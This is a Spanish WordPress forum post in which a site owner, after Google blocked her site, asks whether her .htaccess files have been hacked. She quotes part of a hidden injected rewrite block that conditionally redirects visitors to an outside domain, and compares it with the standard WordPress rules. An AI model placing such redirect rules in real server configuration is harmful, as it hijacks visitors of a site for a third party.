archivo .htaccess y seguridad

  • kingsj

    (@kingsj)


    hace 12 años, 8 meses

    Hola,
    Tengo un poco de lío con los archivos .htaccess.

    Estos archivos son correctos??????
    Cuando se habla de la seguridad de wordpress y de modificar los archivos .htaccess de cuál estamos hablando????
    Hace poco sufrí el bloqueo de mi página por google y estoy un poco preocupada sobre todo con los dos archivos access ( 1 y 2) por si son estos los que han hackeado ya que en ellos aparecen unas url que no son las mías.
    Gracias de antemano por vuestra ayuda

    El directorio de mi web es:
    Principal: el del servidor donde están las carpetas: backup_db, errors,logs,tmp y web
    y donde además hay un archivo .htaccess (le llamaré access-1)
    Dentro de la carpeta web. Está mi web propiamente dicha, donde tengo instalado el wordpress con sus carpetas de wp-admin, wp-content, -wp-includes,… y además hay otro archivo .htaccess (le llamaré access-2)
    Dentro de la carpeta wp-content. Están las carpetas de languajes, plugins, themes,…. y además hay otro archivo .htaccess (le llamaré access-3)

    Mi pregunta es:
    los archivos access-1 y access-3 son practicamente iguales y tienen los códigos escritos en la línea 832 en vez de empezar en la línea 1 como si quisieran estar escondidos y el código es del tipo:
    <IfModule prefork.c>
    RewriteEngine On
    RewriteCond %{REQUEST_METHOD} ^GET$
    RewriteCond %{HTTP_REFERER}
    RewriteCond %{HTTP_USER_AGENT}
    RewriteCond %{REQUEST_FILENAME}…… con extensiones de los archivos
    RewriteCond %{HTTP_COOKIE}
    RewriteCond %{HTTP_USER_AGENT}…….. de estos hay 10 o 12
    RewriteCond %{HTTPS}
    RewriteRule ^(.*)$ http://%{REMOTE_PORT}.peachtreepropainters.net/url?sa=t&source=web&cd=24&ved=0q11I4VGO&url=http://%{HTTP_HOST}%{REQUEST_URI}&ei=25Qscq3K6Ky1rY2Oz1M08Zq1oQ==&usg=Yu95CdJYTaLlKWAWgfhaDE&sig2=V8MJFffJnieyZdGM5Lhx-n [R=302,L,CO=fOa:26:%{HTTP_HOST}:11718:/:0:HttpOnly]
    </IfModule>
    #00f45c7fd9edac….. un número largo compuesto por números y letras

    No os lo pongo completo pero supongo que si alguno de vosotros entiende sabrá que hacen.

    El archivo access- 2: tiene este código:
    # BEGIN WordPress
    <IfModule mod_rewrite.c>
    RewriteEngine On
    RewriteBase /
    RewriteRule ^index\.php$ – [L]
    RewriteCond %{REQUEST_FILENAME} !-f
    RewriteCond %{REQUEST_FILENAME} !-d
    RewriteRule . /index.php [L]
    </IfModule>

  • El debate ‘archivo .htaccess y seguridad’ está cerrado a nuevas respuestas.